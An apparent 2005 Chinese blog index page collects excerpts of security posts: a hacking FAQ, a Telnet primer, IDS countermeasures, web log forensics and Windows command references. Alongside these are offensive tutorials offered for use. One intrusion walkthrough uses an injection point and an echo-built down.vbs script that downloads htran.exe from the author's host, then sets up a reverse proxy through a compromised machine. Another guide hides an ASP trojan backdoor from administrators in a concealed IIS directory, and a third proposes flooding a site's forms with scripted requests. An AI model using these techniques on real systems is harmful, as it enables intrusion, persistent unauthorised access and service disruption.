博文
黑客最起码要懂的16个问题(2005-06-29 20:28:00)
摘要:问:什么是网络安全?
答:网络安全是指网络系统的硬件、软件及其系统中的数据受到保护,不因偶然的或者恶意的原因而遭到破坏、更改、泄露,系统可以连续可靠正常地运行,网络服务不被中断。
问:什么是计算机病毒?
答:计算机病毒(Computer Virus)是指编制者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码。
问:什么是木马?
答:木马是一种带有恶意性质的远程控制软件。木马一般分为客户端(client)和服务器端(server)。客户端就是本地使用的各种命令的控制台,服务器端则是要给别人运行,只有运行过服务器端的计算机才能够完全受控。木马不会像病毒那样去感染文件。
问:什么是防火墙?它是如何确保网络安全的?
答:使用防火墙(Firewall)是一种确保网络安全的方法。防火墙是指设置在不同网络(如可信任的企业内部网和不可信的公共网)或网络安全域之间的一系列部件的组合。它是不同网络或网络安全域之间信息的惟一出入口,能根据企业的安全政策控制(允许、拒绝、监测)出入网络的信息流,且本身具有较强的抗攻击能力。它是提供信息安全服务,实现网络和信息安全的基础设施。
问:什么是后门?为什么会存在后门?
答:后门(Back Door)是指一种绕过安全性控制而获取对程序或系统访问权的方法。在软件的开发阶段,程序员常会在软件内创建后门以便可以修改程序中的缺陷。如果后门被其他人知道,或是在发布软件之前没有删除,那么它就成了安全隐患。
问:什么叫入侵检测?﹖
答:入侵检测是防火墙的合理补充,帮助系统对付网络攻击,扩展系统管理员的安全管理能力(包括安全审计、监视、进攻识别和响应),提高信息安全基础结构的完整性。它从计算机网络系统中的若干关键点收集信息,并分析这些信息,检查网络中是否有违反安全策略的行为和遭到袭击的迹象
问:什么叫数据包监测?它有什么作用?
答:数据包监测可以被认为是一根窃听电话线在计算机网络中的等价物。当某人在“监听”网络时,他们实际上是在阅读和解释网络上传送的数据包。如果你需要在互联网上通过计算机发送一封电子邮件或请求下载一个网页,这些操作都会使数据通过你和数据目的地之间的许多计算机。这些传输信息时经过的计算机都能够看到你发送的数据,而数据包监测工具就允许某人截获数据并且查看它。
问:什么是NIDS?
......
telnet协议(2005-06-29 20:27:00)
摘要:一 摘要
二 远程登录
三 Telnet协议
四 Win2000的Telnet服务
五 在telnet中该做什么
六 结束语
一 摘要
Telnet的应用不仅方便了我们进行远程登录,也给hacker们提供了又一种入侵手段和后门,但无论如何,在你尽情享受Telnet所带给你的便捷的同时,你是否真正的了解Telnet呢?
二 远程登录
Telnet服务虽然也属于客户机/服务器模型的服务,但它更大的意义在于实现了基于Telnet协议的远程登录(远程交互式计算),那么就让我们来认识一下远程登录。
1 远程登陆的基本概念
先来看看什么叫登录:分时系统允许多个用户同时使用一台计算机,为了保证系统的安全和记帐方便,系统要求每个用户有单独的帐号作为登录标识,系统还为每个用户指定了一个口令。用户在使用该系统之前要输入标识和口令,这个过程被称为'登录'。
远程登陆是指用户使用Telnet命令,使自己的计算机暂时成为远程主机的一个仿真终端的过程。仿真终端等效于一个非智能的机器,它只负责把用户输入的每个字符传递给主机,再将主机输出的每个信息回显在屏幕上。
2 远程登陆的产生及发展
我们可以先构想一个提供远程文字编辑的服务,这个服务的实现需要一个接受编辑文件请求和数据的服务器以及一个发送此请求的客户机。客户机将建立一个从本地机到服务器的TCP连接,当然这需要服务器的应答,然后向服务器发送键入的信息(文件编辑信息),并读取从服务器返回的输出。以上便是一个标准而普通的客户机/服务器模型的服务。
似乎有了客户机/服务器模型的服务,一切远程问题都可以解决了。然而实际并非你想象的那样简单,如果我们仅需要远程编辑文件,那么刚才所构想的服务完全可以胜任,但假如我们的要求并不是这么简单,我们还想实现远程用户管理,远程数据录入,远程系统维护,想实现一切可以在远程主机上实现的操作,那么我们将需要大量专用的服务器程序并为每一个可计算服务都使用一个服务器进程,随之而来的问题是:远程机器会很快对服务器进程应接不暇,并淹没在进程的海洋里(我们在这里排除最专业化的远程机器)。
那么有没有办法解决呢?当然有,我们可以用远程登录来解决这一切。我们允许用户在远地机器上建立一个登录会话,然后通过执行命令来实现更一般的服务,就像在本地操作一样。这样,我们便可以访问远地系统上所有......
十大入侵检测系统高风险事件及其处置对策(2005-06-29 20:26:00)
摘要:内联网入侵检测系统(以下简称“IDS系统”)能够及时发现一些内联网内的网络病毒、系统漏洞、异常攻击等高风险事件并进行有效处置,从而增强了内联网的安全性,有力地保障了各重要业务系统的正常运行。为了切实加强内联网管理、充分发挥“IDS系统”的作用,下面笔者根据安全监控高风险事件来分析问题、提出对策,以供大家参考。
事件1 Windows 2000/XP RPC服务远程拒绝服务攻击
漏洞存在于Windows系统的DCE-RPC堆栈实现中,远程攻击者可以连接TCP 135端口,发送畸形数据,可导致关闭RPC服务,关闭RPC服务可以引起系统停止对新的RPC请求进行响应,产生拒绝服务。
[对策]
1、临时处理方法:使用防火墙或Windows系统自带的TCP/IP过滤机制对TCP 135端口进行限制,限制外部不可信任主机的连接。
2、彻底解决办法:打安全补丁。
事件2 Windows系统下MSBLAST(冲击波)蠕虫传播
感染蠕虫的计算机试图扫描感染网络上的其他主机,消耗主机本身的资源及大量网络带宽,造成网络访问能力急剧下降。
[对策]
1、下载完补丁后断开网络连接再安装补丁。
2、清除蠕虫病毒。
事件3 Windows系统下Sasser(震荡波)蠕虫传播
蠕虫攻击会在系统上留下后门并可能导致Win 2000/XP操作系统重启,蠕虫传播时可能导致被感染主机系统性能严重下降以及被感染网络带宽被大量占用。
[对策]
1、首先断开计算机网络。
2、然后用专杀工具查杀毒。
3、最后打系统补丁。
事件4 TELNET服务暴力猜测用户口令
TELNET服务是常见远程登录仿真服务,用户可以使用TELNET远程登录系统,执行任意命令。此事件属获取权限类攻击。攻击者可能正在尝试猜测有效的TELNET服务用户名和口令,如果成功,攻击者可以登录到系统执行各种命令甚至完全控制系统。
[对策]
密切留意攻击来源的进一步活动,如果觉得有必要阻塞其对服务器的连接访问。
事件5 TELNET服务用户认证失败
TELNET服务往往是攻击者入侵系统的渠道之一。大多数情况下,合法用户在TELNET登录过程中会认证成功。如果出现用户名或口令无效等情况,TELNET服务器会使认证失败。如果登......
Web服务器记录中查找黑客踪迹(2005-06-29 20:25:00)
摘要:摘要:本文主要讲述如何分析Web服务器记录,在众多记录里查找黑客攻击的蛛丝马迹,并针对当今流行的两类Web服务器给出具体的一些实例。
现今的网络,安全越来越受到大家的重视,在构建网络安全环境时,在技术手段,管理制度等方面都逐步加强,设置防火墙,安装入侵检测系统等等。但网络安全是个全方位的问题,忽略哪一点都会造成木桶效应,使得整个安全系统虚设。本文从分析Web服务器的logging记录来找出漏洞,防范攻击,从而加强Web服务器安全。
Web服务是Internet所提供最多,最丰富的服务,各种Web服务器自然也是受到攻击最多的,我们采用了很多措施来防止遭受攻击和入侵,其中查看Web服务器的记录是最直接,最常用,又比较有效的一种方法,但logging记录很庞大,查看logging记录是很繁琐的事情,如果抓不住重点,攻击线索就容易被忽略。下面就对最流行的两类Web服务器:Apache和IIS做攻击的实验,然后在众多的记录中查到攻击的蛛丝马迹,从而采取适当的措施加强防范。
1、默认的web记录
对于IIS,其默认记录存放在c:\winnt\system32\logfiles\w3svc1,文件名就是当天的日期,记录格式是标准的W3C扩展记录格式,可以被各种记录分析工具解析,默认的格式包括时间、访问者IP地址、访问的方法(GET or POST…)、请求的资源、HTTP状态(用数字表示)等。对于其中的HTTP状态,我们知道200-299表明访问成功;300-399表明需要客户端反应来满足请求;400-499和500-599表明客户端和服务器出错;其中常用的如404表示资源没找到,403表示访问被禁止。
Apache的默认记录存放在/usr/local/apache/logs,其中最有用的记录文件是access_log,其格式包括客户端IP、个人标示(一般为空)、用户名(如果需要认证)、访问方式(GET or POST…)、HTTP状态、传输的字节数等。
2、收集信息
我们模拟黑客攻击服务器的通常模式,先是收集信息,然后通过远程命令一步步实施入侵。我们使用的工具是netcat1.1 for windows,Web服务器ip为10.22.1.100,客户端IP为:10.22.1.80。
C:>nc -n 10.22.1.100 ......
用Winsock实现对网站数据库的数据注入(2005-06-29 20:23:00)
摘要:在写这篇文章之前,有必要对“注入”一词阐述一下。区别于通常的SQL注入,这里的注入实际上只是构造HTTP请求报文,以程序的方式代替WEB提交页面,实现数据的自动提交。嘿嘿,说到这,我看到你诡异的笑容了,我们只要写个循环,用什么语言你说了算,向特定的WEB页面发送HTTP报文,只要几分钟,呵呵他的本本就爆了,而且……嘿、嘿、嘿……偶喝杯茶,接下再写。
首先,还是温习一下HTTP协议吧。我们在打开一个网站时,比如说http://www.163.com,实际上IE作为一个客户端,它将向服务器发送如下的请求报文(偶用sniffer截得的):
GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-
powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: www.163.com
Connection: Keep-Alive
Cookie: NETEASE_SSN=jsufcz; NETEASE_ADV=11&22; Province=0; City=0; NTES_UV_COOKIE=YES
我们看到在以上的报文中,有很多字段,当然其中有很多并不是必须的,如果我们自己编程,只关心必要的就行了。在HTTP/1.1协议中规定了最小请求消息由方法字段(GET/POST/HEAD)和主机字段(HOST)构成。如上面的
GET / HTTP/1.1
HOST:www.163.com
但在HTTP/1.0中,HOST字段并不是必须的,这里为什么不能省,相信你也知道,不晓得的话也不打紧,接下来看。
为了向服务器发送数据,浏览器通常采用GET或POST方法向服务器提交报文。服务器在收到报文之后,解码分析出所需的数据并进行处理,最后返回结果。通常......
妙用代理渗透内网(2005-06-29 20:22:00)
摘要:正文
代理在入侵里的作用-----妙用代理,渗透内网
一、踩点
主机: http://www.baidu.com/
OS:Windows 2000 + IIS 5.0 + MSSQL
端口:80 21
数据库放内网,IP为 192.168.1.2 ,更重要的是内网数据库可以上网.
首页存在注入漏洞,sa登陆.
注入点:
http://www.baidu.com/list.asp?id=1
二、入侵思路
1.给内网目标机装个代理服务器
2.把弄好的那个代理端口映到公网.
3.本机用sockscap连接公网映的那个端口,这样,自己也就进到了内网。
4.接下来就是找共享,嗅探,社会工程学等等了。
三、入侵准备
1.公网肉鸡一只:218.3.1.1
2.工具:htran2.4,SocksCap,扫描器一份,NBSI 2.0一份。
3.A表示数据库主机,B表示公网肉鸡 C表示网站放Web的地方 D表示本机(也在内网)
4.A:192.168.1.2 B:218.3.1.1 C:www.baidu.com D:192.168.0.25
四、入侵进行时
1.工具上传:
在nbsi下执行:
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >down.vbs
然后下载工具:
cscript down.vbs http://IP/htran.exe htran.exe //到我的空间下载htran.exe
2.安装Socks5服务
在nbsi下执行:
htran.exe -install //安装Socks5服务
htran.exe -start //启动Socks5服务
3.反弹进行时
在B上运行: htran.exe -s -listen 520 5200 //监听端口
在nbsi下执行:h......
建造永不被杀的80端口后门(www.hacker.com.cn 黑客防线)(2005-06-29 20:12:00)
摘要:www.hacker.com.cn 黑客防线
参考LCX在X档案发表过永远不被杀的的后门,自己就实验起来,只要把ASP木马放到其中一个站点中某个深的目录中,再在Internet 服务管理器面中选着这个站点(比如默认管理站点)打开修改属性->主目录中,把“应用程序保护”中改为"低",再在"写入""前面打上钩,在浏览器中输入ASP木马路径,输入密码以后进入管理页面,运行CMD命令还可以加用户之类的果然是管理员权限,呵呵用后发觉还不错,自觉以为就不错,而且上传文件都是在WEB进程上来着,而且还有系统权限,还觉得这样建立肉鸡相对来说比较安全就走了,后来想不到不过几天这个后门过几就没了,浏览上去什么都连ASP木马都没了,到底怎么回事?而且对方还搞了防火墙,只开21,80端口,眼汪汪丢去真可惜,看来管理员是察觉到了。看着我想有两个可能,一是ASP木马被杀,被管理员查到ASP木马就删了,二是那个可能管理员看到这个站点的属性改了就XXX~~~~,你也许会说用站点属性修改过的可以“写入”来写个木马上去,可是错了,管理员把默认管理站点都删了,或者者做其他修改了,昏,本来好好的后门却成了比较明显的暴露给管理员看了,而且最新的ASP也被会杀毒,看来个ASP看来这种方法也是不太隐蔽,还需要改进,突然想到可以通过后来参考建立隐藏主页,而且是虚拟目录可以设置“应用程序保护”为低的,其他站点中的目录属性是不可以设置这样的属性的,这样就不会暴露Internet 服务管理器中任何修改的迹象了,(对于一般的管理员来说,对于BT的我就不敢说了),OK我们来第一步
建立个隐藏虚拟主页(同时也可以做主页一举两得)
一般情况下,如果在肉鸡上开主页的话,只要管理员查看一下iis管理器程序,就会发现我们的主页,这样不但我们的主页暴露了,还可能会被管理员把我们给踢出去。而今天我教大家的方法是让管理员在iis管理器里发现不了方法。首先打开肉机(本例中以自己的机器为例)iis管理器,选定一个文件夹,然后点击右键,选择“资源管理器”,到网站的根目录下新建一个文件夹kiss,然后到system32上新建一个文件夹,我这里取名为myhome(这个文件夹尽量隐蔽的目录深一些,才不会被管理员发现),回到iis管理器按f5刷新就会看到kiss这个目录,选中它后,点击右......
常用网络命令及命令实例详解(四)(2005-06-29 19:30:00)
摘要: routing ip ospf add/delete/set/show interface 在指定接口上添加、删除、配置或显示 OSPF。
routing ip ospf add/delete/set/show area 添加、删除、配置或显示 OSPF 区域。
routing ip ospf add/delete/show range 在指定的 OSPF 区域上添加、删除、配置或显示范围。
routing ip ospf add/delete/set/show virtif 添加、删除、配置或显示 OSPF 虚拟接口。
routing ip ospf add/delete/show neighbor 添加、删除、配置或显示 OSPF 邻居。
routing ip ospf add/delete/show protofilter 添加、删除、配置或显示 OSPF 外部路由的路由信息源。
routing ip ospf add/delete/show routefilter 添加、删除、配置或显示 OSPF 外部路由的路由筛选。
routing ip ospf show areastats 显示 OSPF 区域统计。
routing ip ospf show lsdb 显示 OSPF 链接状态数据库。
routing ip ospf show virtifstats 显示 OSPF 虚拟链接统计。
routing ip relay set global 配置“DHCP 中继代理程序”的全局设置。
routing ip relay add/delete/set interface 在指定接口上添加、删除或配置“DHCP 中继代理程序”设置。
routing ip relay add/delete dhcpserver 在 DHCP 服务器地址列表中添加或删除 DHCP 服务器的 IP 地址。
routing ip relay show ifbinding 显示接口的 IP 地址绑定。
routing ip relay show ifconfig 显示每个接口的“DHCP 中继代理程序”配置。
routing ip relay show ifstats 显示每个接口的 DHCP 统......
常用网络命令及命令实例详解(三)(2005-06-29 19:29:00)
摘要:有关 runas 命令的使用范例,请参阅“相关主题”。
尽管 runas 通常由 Administrator 帐户使用,但并非仅限于 Administrator 帐户。任何拥有多个帐户的用户均可以利用备用凭据,使用 runas 运行程序、MMC 控制台或“控制面板”项。
如果要在计算机上使用 Administrator 帐户,对于 /user:,键入下列参数之一:
/user:AdministratorAccountName@ComputerName
/user:ComputerName\AdministratorAccountName
如果想以域管理员身份使用这个命令,键入下列参数之一:
/user:AdministratorAccountName@DomainName
/useromainName\AdministratorAccountName
runas 命令允许您运行程序 (*.exe)、保存的 MMC 控制台 (*.msc)、程序和保存的 MMC 控制台的快捷方式及“控制面板”项。作为另一组(例如“Users”或“Power Users”组)的成员登录到计算机时,可以以管理员的身份运行。
可以使用 runas 命令来启动任何程序、MMC 控制器或“控制面板”项。只要提供适当的用户帐户和密码信息,用户帐户就具有登录到计算机的能力,并且程序、MMC 控制台、“控制面板”项在系统中及对该用户帐户均可用.
runas 命令允许您管理其他域的服务器(运行工具的计算机和要管理的服务器在不同的域中)。
如果尝试使用 runas 从网络位置启动程序、MMC 控制台或“控制面板”项,可能会因为用来连接网络共享的凭据与用来启动程序的凭据不同而失败。后者的凭据可能无法访问同一网络共享。
有些项,例如“打印机”文件夹和桌面项,间接由 Windows 2000 打开,而不能使用 runas 命令启动。
如果 runas 命令失败,则可能是没有运行 RunAs 服务或使用的用户帐户无效。要检查 RunAs 服务的状态,请在“计算机管理”中单击“服务和应用程序”,然后单击“服务”。要测试用户帐户,请尝试使用该帐户登录合适的域。
范例
要在本地计算机上以管理员身份启动 Windows 2000 命......
常用网络命令及命令实例详解(二)(2005-06-29 19:29:00)
摘要:rsh 命令将标准输入复制到远程 command,将远程 command 的标准输出复制到其标准输出,将远程 command 的标准错误复制到其标准错误。Rsh 通常在远程命令终止时终止。
使用重定向符号
为了使重定向在远程计算机上发生,要以引号引住重定向符号(例如 ">>")。如果不使用引号,重定向会在本地计算机发生。例如,以下命令将远程文件“RemoteFile”附加到本地文件“LocalFile”中:
rsh othercomputer cat remotefile >> localfile
以下命令将远程文件 Remotefile 附加到远程文件 otherremotefile 中:
rsh othercomputer cat remotefile ">>" otherremotefile
使用 rsh
在使用已登录到某个域并且运行 Windows XP Professional 的计算机时,该域的主域控制器必须可用于确认用户名或 rsh 命令失败。
.rhosts 文件
.rhosts 文件通常许可 UNIX 系统的网络访问权限。.rhosts 文件列出可以访问远程计算机的计算机名及关联的登录名。在正确配置了 .rhosts 文件的远程计算机上运行 rcp、rexec 或 rsh 命令时,您不必提供远程计算机的登录和密码信息。
.rhosts 文件是一个文本文件,该文件中每一行为一个条目。条目由本地计算机名、本地用户名和有关该条目的所有注释组成。每个条目均由制表符或空格分开,注释用符号 (#) 打头。例如:
host7 #This computer is in room 31A
.rhosts 文件必须在远程计算机的用户主目录中。有关远程计算机 .rhosts 文件特定执行的详细信息,请参阅远程系统的文档。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要以名称 admin1 在远程计算机 vax1 上执行 telcon 命令,请键入:
rsh vax1 -l admin1 telcon
Tftp
向运行平凡文件传输协......